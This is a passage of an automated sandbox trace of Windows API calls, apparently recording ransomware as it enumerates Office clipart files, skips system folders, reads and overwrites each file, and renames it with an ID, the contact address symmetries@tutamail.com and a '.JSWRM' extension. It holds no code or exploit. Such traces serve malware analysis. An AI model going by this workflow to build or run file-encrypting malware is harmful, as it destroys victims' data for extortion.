ftCreationTime.dwLowDateTime=0xe05b6d7, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0xe05b6d7, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0xe05b6d7, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x2dae, dwReserved0=0x60002, dwReserved1=0x20924e, cFileName="J0099152.JPG", cAlternateFileName="")) returned 1 [0079.629] lstrcmpiW (lpString1="J0099152.JPG", lpString2=".") returned 1 [0079.629] lstrcmpiW (lpString1="J0099152.JPG", lpString2="..") returned 1 [0079.629] lstrcmpiW (lpString1="J0099152.JPG", lpString2="...") returned 1 [0079.629] lstrcmpiW (lpString1="J0099152.JPG", lpString2="windows") returned -1 [0079.629] lstrcmpiW (lpString1="J0099152.JPG", lpString2="recovery") returned -1 [0079.629] lstrcmpiW (lpString1="J0099152.JPG", lpString2="perflogs") returned -1 [0079.629] lstrcmpiW (lpString1="J0099152.JPG", lpString2="documents and settings") returned 1 [0079.629] lstrcmpiW (lpString1="J0099152.JPG", lpString2="$RECYCLE.BIN") returned 1 [0079.629] lstrcmpiW (lpString1="J0099152.JPG", lpString2="system volume information") returned -1 [0079.629] lstrcmpiW (lpString1="J0099152.JPG", lpString2="msocache") returned -1 [0079.629] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x2412b8 [0079.629] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="J0099152.JPG", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0079.629] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="J0099152.JPG", cchWideChar=12, lpMultiByteStr=0x345ebd8, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="J0099152.JPG", lpUsedDefaultChar=0x0) returned 12 [0079.629] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2412b8 | out: hHeap=0x1e0000) returned 1 [0079.629] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x241380 [0079.629] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="J0099152.JPG", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0079.629] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="J0099152.JPG", cchWideChar=12, lpMultiByteStr=0x345eba8, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="J0099152.JPG", lpUsedDefaultChar=0x0) returned 12 [0079.629] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x241380 | out: hHeap=0x1e0000) returned 1 [0079.629] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x210ad8 [0079.629] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2100c0 | out: hHeap=0x1e0000) returned 1 [0079.629] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0079.629] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345e8fc, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0079.629] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x210580 [0079.629] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0099152.JPG" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0099152.jpg"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x314 [0079.630] GetFileSizeEx (in: hFile=0x314, lpFileSize=0x345e890 | out: lpFileSize=0x345e890*=11694) returned 1 [0079.630] SetFilePointer (in: hFile=0x314, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0079.630] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x2da0) returned 0x24d210 [0079.630] ReadFile (in: hFile=0x314, lpBuffer=0x24d210, nNumberOfBytesToRead=0x2da0, lpNumberOfBytesRead=0x345e89c, lpOverlapped=0x0 | out: lpBuffer=0x24d210*, lpNumberOfBytesRead=0x345e89c*=0x2da0, lpOverlapped=0x0) returned 1 [0079.676] SetFilePointer (in: hFile=0x314, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0079.677] WriteFile (in: hFile=0x314, lpBuffer=0x24d210*, nNumberOfBytesToWrite=0x2da0, lpNumberOfBytesWritten=0x345e898, lpOverlapped=0x0 | out: lpBuffer=0x24d210*, lpNumberOfBytesWritten=0x345e898*=0x2da0, lpOverlapped=0x0) returned 1 [0079.677] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x24d210 | out: hHeap=0x1e0000) returned 1 [0079.677] CloseHandle (hObject=0x314) returned 1 [0079.677] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x210320 [0079.677] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 24 [0079.677] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d260 [0079.677] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x22d260, cchWideChar=24 | out: lpWideCharStr="symmetries@tutamail.com") returned 24 [0079.677] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22ce70 [0079.677] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d260 | out: hHeap=0x1e0000) returned 1 [0079.677] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 8 [0079.677] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x10) returned 0x23a2d0 [0079.677] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x23a2d0, cchWideChar=8 | out: lpWideCharStr="9A8I36E") returned 8 [0079.677] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23a2d0 | out: hHeap=0x1e0000) returned 1 [0079.677] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xa0) returned 0x23cd50 [0079.677] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xee) returned 0x247990 [0079.677] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23cd50 | out: hHeap=0x1e0000) returned 1 [0079.677] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22ce70 | out: hHeap=0x1e0000) returned 1 [0079.677] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0099152.JPG" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0099152.jpg"), lpNewFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0099152.JPG.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0099152.jpg.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0079.678] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x247990 | out: hHeap=0x1e0000) returned 1 [0079.679] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x210320 | out: hHeap=0x1e0000) returned 1 [0079.679] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x210580 | out: hHeap=0x1e0000) returned 1 [0079.679] FindNextFileW (in: hFindFile=0x231b00, lpFindFileData=0x345e928 | out: lpFindFileData=0x345e928*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0xe05b6d7, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0xe05b6d7, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0xe05b6d7, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x3632, dwReserved0=0x60002, dwReserved1=0x20924e, cFileName="J0099153.WMF", cAlternateFileName="")) returned 1 [0079.679] lstrcmpiW (lpString1="J0099153.WMF", lpString2=".") returned 1 [0079.679] lstrcmpiW (lpString1="J0099153.WMF", lpString2="..") returned 1 [0079.679] lstrcmpiW (lpString1="J0099153.WMF", lpString2="...") returned 1 [0079.679] lstrcmpiW (lpString1="J0099153.WMF", lpString2="windows") returned -1 [0079.679] lstrcmpiW (lpString1="J0099153.WMF", lpString2="recovery") returned -1 [0079.679] lstrcmpiW (lpString1="J0099153.WMF", lpString2="perflogs") returned -1 [0079.679] lstrcmpiW (lpString1="J0099153.WMF", lpString2="documents and settings") returned 1 [0079.679] lstrcmpiW (lpString1="J0099153.WMF", lpString2="$RECYCLE.BIN") returned 1 [0079.679] lstrcmpiW (lpString1="J0099153.WMF", lpString2="system volume information") returned -1 [0079.679] lstrcmpiW (lpString1="J0099153.WMF", lpString2="msocache") returned -1 [0079.679] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x240ef8 [0079.679] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="J0099153.WMF", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0079.679] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="J0099153.WMF", cchWideChar=12, lpMultiByteStr=0x345ebd8, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="J0099153.WMF", lpUsedDefaultChar=0x0) returned 12 [0079.679] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x240ef8 | out: hHeap=0x1e0000) returned 1 [0079.679] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x241268 [0079.679] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="J0099153.WMF", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0079.679] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="J0099153.WMF", cchWideChar=12, lpMultiByteStr=0x345eba8, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="J0099153.WMF", lpUsedDefaultChar=0x0) returned 12 [0079.679] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x241268 | out: hHeap=0x1e0000) returned 1 [0079.679] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x2104e8 [0079.679] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x210ad8 | out: hHeap=0x1e0000) returned 1 [0079.679] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0079.679] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345e8fc, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0079.679] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x2106b0 [0079.679] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0099153.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0099153.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x314 [0079.680] GetFileSizeEx (in: hFile=0x314, lpFileSize=0x345e890 | out: lpFileSize=0x345e890*=13874) returned 1 [0079.680] SetFilePointer (in: hFile=0x314, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0079.680] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x3630) returned 0x24d210 [0079.680] ReadFile (in: hFile=0x314, lpBuffer=0x24d210, nNumberOfBytesToRead=0x3630, lpNumberOfBytesRead=0x345e89c, lpOverlapped=0x0 | out: lpBuffer=0x24d210*, lpNumberOfBytesRead=0x345e89c*=0x3630, lpOverlapped=0x0) returned 1 [0079.682] SetFilePointer (in: hFile=0x314, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0079.682] WriteFile (in: hFile=0x314, lpBuffer=0x24d210*, nNumberOfBytesToWrite=0x3630, lpNumberOfBytesWritten=0x345e898, lpOverlapped=0x0 | out: lpBuffer=0x24d210*, lpNumberOfBytesWritten=0x345e898*=0x3630, lpOverlapped=0x0) returned 1 [0079.682] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x24d210 | out: hHeap=0x1e0000) returned 1 [0079.682] CloseHandle (hObject=0x314) returned 1 [0079.682] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x210158 [0079.682] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 24 [0079.682] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22cdc8 [0079.682] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x22cdc8, cchWideChar=24 | out: lpWideCharStr="symmetries@tutamail.com") returned 24 [0079.683] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d0a0 [0079.683] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22cdc8 | out: hHeap=0x1e0000) returned 1 [0079.683] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 8 [0079.683] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x10) returned 0x23a4b0 [0079.683] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x23a4b0, cchWideChar=8 | out: lpWideCharStr="9A8I36E") returned 8 [0079.683] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23a4b0 | out: hHeap=0x1e0000) returned 1 [0079.683] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xa0) returned 0x23dbc0 [0079.683] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xee) returned 0x247990 [0079.683] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23dbc0 | out: hHeap=0x1e0000) returned 1 [0079.683] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d0a0 | out: hHeap=0x1e0000) returned 1 [0079.683] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0099153.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0099153.wmf"), lpNewFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0099153.WMF.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0099153.wmf.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0079.684] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x247990 | out: hHeap=0x1e0000) returned 1 [0079.684] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x210158 | out: hHeap=0x1e0000) returned 1 [0079.684] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2106b0 | out: hHeap=0x1e0000) returned 1 [0079.684] FindNextFileW (in: hFindFile=0x231b00, lpFindFileData=0x345e928 | out: lpFindFileData=0x345e928*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0xe05b6d7, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0xe05b6d7, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0xe05b6d7, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x1b11, dwReserved0=0x60002, dwReserved1=0x20924e, cFileName="J0099154.JPG", cAlternateFileName="")) returned 1 [0079.684] lstrcmpiW (lpString1="J0099154.JPG", lpString2=".") returned 1 [0079.684] lstrcmpiW (lpString1="J0099154.JPG", lpString2="..") returned 1 [0079.684] lstrcmpiW (lpString1="J0099154.JPG", lpString2="...") returned 1 [0079.684] lstrcmpiW (lpString1="J0099154.JPG", lpString2="windows") returned -1 [0079.684] lstrcmpiW (lpString1="J0099154.JPG", lpString2="recovery") returned -1 [0079.684] lstrcmpiW (lpString1="J0099154.JPG", lpString2="perflogs") returned -1 [0079.684] lstrcmpiW (lpString1="J0099154.JPG", lpString2="documents and settings") returned 1 [0079.684] lstrcmpiW (lpString1="J0099154.JPG", lpString2="$RECYCLE.BIN") returned 1 [0079.684] lstrcmpiW (lpString1="J0099154.JPG", lpString2="system volume information") returned -1 [0079.684] lstrcmpiW (lpString1="J0099154.JPG", lpString2="msocache") returned -1 [0079.684] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x2410d8 [0079.684] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="J0099154.JPG", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0079.684] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="J0099154.JPG", cchWideChar=12, lpMultiByteStr=0x345ebd8, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="J0099154.JPG", lpUsedDefaultChar=0x0) returned 12 [0079.684] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2410d8 | out: hHeap=0x1e0000) returned 1 [0079.684] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x241060 [0079.684] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="J0099154.JPG", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0079.684] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="J0099154.JPG", cchWideChar=12, lpMultiByteStr=0x345eba8, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="J0099154.JPG", lpUsedDefaultChar=0x0) returned 12 [0079.684] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x241060 | out: hHeap=0x1e0000) returned 1 [0079.684] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x2109a8 [0079.684] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2104e8 | out: hHeap=0x1e0000) returned 1 [0079.684] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0079.684] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345e8fc, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0079.684] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x210d38 [0079.684] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0099154.JPG" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0099154.jpg"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x314 [0079.685] GetFileSizeEx (in: hFile=0x314, lpFileSize=0x345e890 | out: lpFileSize=0x345e890*=6929) returned 1 [0079.685] SetFilePointer (in: hFile=0x314, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0079.685] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x1b10) returned 0x205850 [0079.685] ReadFile (in: hFile=0x314, lpBuffer=0x205850, nNumberOfBytesToRead=0x1b10, lpNumberOfBytesRead=0x345e89c, lpOverlapped=0x0 | out: lpBuffer=0x205850*, lpNumberOfBytesRead=0x345e89c*=0x1b10, lpOverlapped=0x0) returned 1 [0079.687] SetFilePointer (in: hFile=0x314, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0079.687] WriteFile (in: hFile=0x314, lpBuffer=0x205850*, nNumberOfBytesToWrite=0x1b10, lpNumberOfBytesWritten=0x345e898, lpOverlapped=0x0 | out: lpBuffer=0x205850*, lpNumberOfBytesWritten=0x345e898*=0x1b10, lpOverlapped=0x0) returned 1 [0079.687] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x205850 | out: hHeap=0x1e0000) returned 1 [0079.687] CloseHandle (hObject=0x314) returned 1 [0079.687] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x210a40 [0079.687] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 24 [0079.687] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22ce70 [0079.687] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x22ce70, cchWideChar=24 | out: lpWideCharStr="symmetries@tutamail.com") returned 24 [0079.687] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22cdc8 [0079.687] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22ce70 | out: hHeap=0x1e0000) returned 1 [0079.687] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 8 [0079.687] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x10) returned 0x23a360 [0079.687] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x23a360, cchWideChar=8 | out: lpWideCharStr="9A8I36E") returned 8 [0079.687] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23a360 | out: hHeap=0x1e0000) returned 1 [0079.687] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xa0) returned 0x23d728 [0079.687] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xee) returned 0x247a88 [0079.687] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23d728 | out: hHeap=0x1e0000) returned 1 [0079.687] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22cdc8 | out: hHeap=0x1e0000) returned 1 [0079.688] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0099154.JPG" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0099154.jpg"), lpNewFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0099154.JPG.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0099154.jpg.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0079.688] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x247a88 | out: hHeap=0x1e0000) returned 1 [0079.688] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x210a40 | out: hHeap=0x1e0000) returned 1 [0079.688] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x210d38 | out: hHeap=0x1e0000) returned 1 [0079.688] FindNextFileW (in: hFindFile=0x231b00, lpFindFileData=0x345e928 | out: lpFindFileData=0x345e928*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0xe081920, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0xe081920, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0xe081920, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x227a, dwReserved0=0x60002, dwReserved1=0x20924e, cFileName="J0099155.JPG", cAlternateFileName="")) returned 1 [0079.688] lstrcmpiW (lpString1="J0099155.JPG", lpString2=".") returned 1 [0079.688] lstrcmpiW (lpString1="J0099155.JPG", lpString2="..") returned 1 [0079.688] lstrcmpiW (lpString1="J0099155.JPG", lpString2="...") returned 1 [0079.688] lstrcmpiW (lpString1="J0099155.JPG", lpString2="windows") returned -1 [0079.688] lstrcmpiW (lpString1="J0099155.JPG", lpString2="recovery") returned -1 [0079.688] lstrcmpiW (lpString1="J0099155.JPG", lpString2="perflogs") returned -1 [0079.689] lstrcmpiW (lpString1="J0099155.JPG", lpString2="documents and settings") returned 1 [0079.689] lstrcmpiW (lpString1="J0099155.JPG", lpString2="$RECYCLE.BIN") returned 1 [0079.689] lstrcmpiW (lpString1="J0099155.JPG", lpString2="system volume information") returned -1 [0079.689] lstrcmpiW (lpString1="J0099155.JPG", lpString2="msocache") returned -1 [0079.689] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x240ef8 [0079.689] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="J0099155.JPG", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0079.689] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="J0099155.JPG", cchWideChar=12, lpMultiByteStr=0x345ebd8, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="J0099155.JPG", lpUsedDefaultChar=0x0) returned 12 [0079.689] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x240ef8 | out: hHeap=0x1e0000) returned 1 [0079.689] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x2410d8 [0079.689] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="J0099155.JPG", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, 